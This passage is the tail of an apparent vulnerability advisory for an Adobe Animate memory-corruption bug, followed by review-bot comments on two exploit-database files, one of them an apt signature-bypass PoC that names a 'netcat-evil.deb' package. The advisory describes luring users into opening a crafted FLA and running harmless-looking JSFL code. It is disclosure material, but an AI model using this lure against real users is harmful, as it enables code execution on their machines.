+ + +3) Drag the MovieClip to the stage + + +4) Bundle FLA/JSFL file, make avail for download as example on how to use +JSFL to call save() / publish() functions. + + +User opens .FLA, runs harmless looking JSFL code then BOOM! + + + +Reference: +https://helpx.adobe.com/security/products/animate/apsb16-38.html + + + + +Disclosure Timeline: +===================================== +Vendor Notification: May 28, 2016 +December 13, 2016 : Public Disclosure + + + + +Exploitation Technique: +======================= +Local + + + + +Severity Level: +================ +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere.
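Review bot: in the 40916.txt hunk the reproduction section depends on `apt_sig_bypass.tar` (`make_inrelease.py`, `netcat-evil.deb`, `InRelease.part1`) that is not in this text file; the only pointer to it is the `Proof of Concept:` line with the `40916.zip` URL at the very bottom, after the `== Reproduction instructions ==` block that uses it, so move or duplicate that link next to the `Source:` line at the top so a reader does not reach `$ tar xvf apt_sig_bypass.tar` before learning where the archive comes from. The file also states no affected or fixed apt version; the only version information is implicit in the VM recipe (`debian-8.6.0-i386-netinst.iso`, i386 only, because the ASLR-based allocation failure is described for a 32-bit address space), and a one-line "tested on" statement would make that explicit. Finally, the text itself says the whole attack succeeds at most about 25% of the time and that `apt-get update` must be rerun until it stops failing; that caveat belongs in the header rather than in the middle of the vulnerability description, since it changes how the PoC is used.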
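Review bot: in the 40915.txt hunk the `Reproduction / POC:` steps say "overly long Class name" and "very long class name" but never give a length or a sample value, and no sample `.fla`, `.as` or JSFL file is attached, so the crash cannot be reproduced from the file as committed; state the class-name length (or the shortest one observed to trigger the access violation) and include the two JSFL lines shown (`fl.getDocumentDOM().save();` and `fl.getDocumentDOM().testMovie();`) as a complete file. The header is also inconsistent with itself: `Vulnerability Type:` says "Critical Memory Corruption Vulnerability" while `Severity Level:` says "High", and `Platforms:` lists "Windows / Macintosh" while the file is placed under `platforms/windows/dos`; pick one severity and either note that the PoC was only tested on Windows or explain the placement. Minor: the `CVE Reference:` block mixes the CVE id with the Adobe bulletin id `APSB16-38`, which is already given as the `Reference:` URL; label the bulletin separately.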